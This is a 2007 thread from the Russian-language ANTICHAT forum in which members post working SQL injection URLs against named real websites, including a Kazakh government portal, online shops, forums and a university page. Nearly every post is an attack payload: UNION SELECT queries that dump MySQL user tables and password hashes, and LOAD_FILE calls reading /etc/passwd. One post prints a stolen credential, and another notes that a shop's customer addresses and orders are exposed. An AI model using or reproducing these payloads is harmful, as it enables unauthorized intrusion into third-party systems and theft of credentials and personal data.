HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.03.2007, 19:36
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

sana.gov.kz



Код:
http://sana.gov.kz/index.php?lang=rus&id_open_rubric=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50...
 
Ответить с цитированием

  #2  
Старый 24.03.2007, 21:23
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.kadis.ru/daily/index.html?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
 
Ответить с цитированием

  #3  
Старый 24.03.2007, 21:25
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

2 Grey

Код:
http://www.kadis.ru/daily/index.html?id=-1+union+select+1,2,3,convert(concat(user,0x3a,password),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+mysql.user/*
root:7312874647bb7446

И мое:
Код:
http://mobilefood.ru/show_cat.php?catid=-1+union+select+concat(username,0x3a,passwd)+from+user+limit+0,1/*
пассы немного странные, аналогичны ФИО-полю.. но как ни странно, подходят..
в базе адрес, телефон, заказы.. в общем, обычный интернет-шоп)
Код:
http://www.domsigar.ru/item.php?entry=1579+and+5=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
тут не подбирал )
 
Ответить с цитированием

  #4  
Старый 24.03.2007, 23:11
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Код:
http://www.bullchart.de/beitrag.php?id=-1+union+select+1,2,3,4,5,concat(username,char(58),password),7,8,9+from+vb_user/*
Зарегано 24757 пользователей на форуме)))

________
Код:
http://www.marotori.com/bestwebdevelopmentanddesign.php?id=-1+union+select+1,2+from+mysql.user/*

Последний раз редактировалось Colkru; 24.03.2007 в 23:26..
 
Ответить с цитированием

  #5  
Старый 25.03.2007, 02:18
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

Цитата:
Сообщение от Colkru  
Код:
http://www.bullchart.de/beitrag.php?id=-1+union+select+1,2,3,4,5,concat(username,char(58),password),7,8,9+from+vb_user/*
Зарегано 24757 пользователей на форуме)))
ты не заметил что форум хостится в другом месте, и эта таблицу к форуму отношения не имеет.
 
Ответить с цитированием

  #6  
Старый 24.03.2007, 22:30
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://www.keckobservatory.org/article.php?id=-103+union+select+1,convert(concat_ws(char(58),user(),version(),database())+using+latin1),3,4,5,6,7,8+from+mysql.user/*
Код:
http://director-online.com/buildArticle.php?id=-1154+union+select+1,2,3,4,5,convert(concat(user_password,char(58),user_name)+using+latin1),7,8+from+user/*
Чтобы убедиться в работоспособности этой скули вам придеться дожаться пока страница загрузиться, потом прокрутить всю страничку доконца,
и только после этого увидеть информацию, короче изврат. минус подставить даже не пытайтесь))
Код:
http://sistem.gemtech.fr/cours.php?Id=2+union+select+1,2,convert(concat_ws(char(58),version(),user(),database())+using+latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #7  
Старый 24.03.2007, 22:56
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.terrabike.com/shop/shop_faqs.php?id=-1+union+select+table_name,2+from+INFORMATION_SCHEMA.TABLES+limit+37,1/*
 
Ответить с цитированием

  #8  
Старый 24.03.2007, 23:53
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

http://www.activeserverpages.ru/faq/default.asp?mode=view&id=1+or+1=@@version--
перебираем через not in
 
Ответить с цитированием

  #9  
Старый 25.03.2007, 02:12
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-30%20UNION%20SELECT%201,2,3,4,LOAD_FILE(0x2f6574632f706173737764),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
 
Ответить с цитированием

  #10  
Старый 25.03.2007, 02:19
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.4site.ru/faq/index.shtml?th=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x00),0x00),4+from+mysql.user/*
Код:
http://www.4site.ru/faq/index.shtml?th=-1+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764),4/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ